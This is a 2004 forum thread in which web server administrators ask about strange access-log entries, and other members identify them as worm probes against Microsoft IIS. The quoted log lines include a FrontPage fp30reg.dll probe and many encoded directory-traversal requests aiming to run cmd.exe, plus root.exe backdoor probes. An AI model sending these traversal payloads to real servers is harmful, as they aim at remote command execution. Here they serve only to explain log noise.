What is fp30reg.dll ?

mg66

I found the following line in my access log ....
63.198.8.12 - - [20/Aug/2004:23:00:21 +11330] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 234 "" ""
Is anyone able to explain what it is?

TRUSTAbyss

Its a worm trying to hack into a IIS server lol , oh god thats funny
Dude , you have nothing to worry about , its a normal log file , see
the 404 part , that means its not found , have a nice day !
In the current beta you can choose what paths you can log , so you
can refuse to log requests from /_vti_bin/ , don't worry about it.

senshi

LMAO
Just hope the poor bloke didnt lose his bottle.

Drag0n

hmm i got something similar to those...
are these also for IIS?
68.189.78.164 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
211.34.181.4 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" ""

TRUSTAbyss

Umm , yeah ! All of these are IIS attacks , in fact everything you see weird
in a log file is most likely an IIS attack , shows how much IIS sucks lol.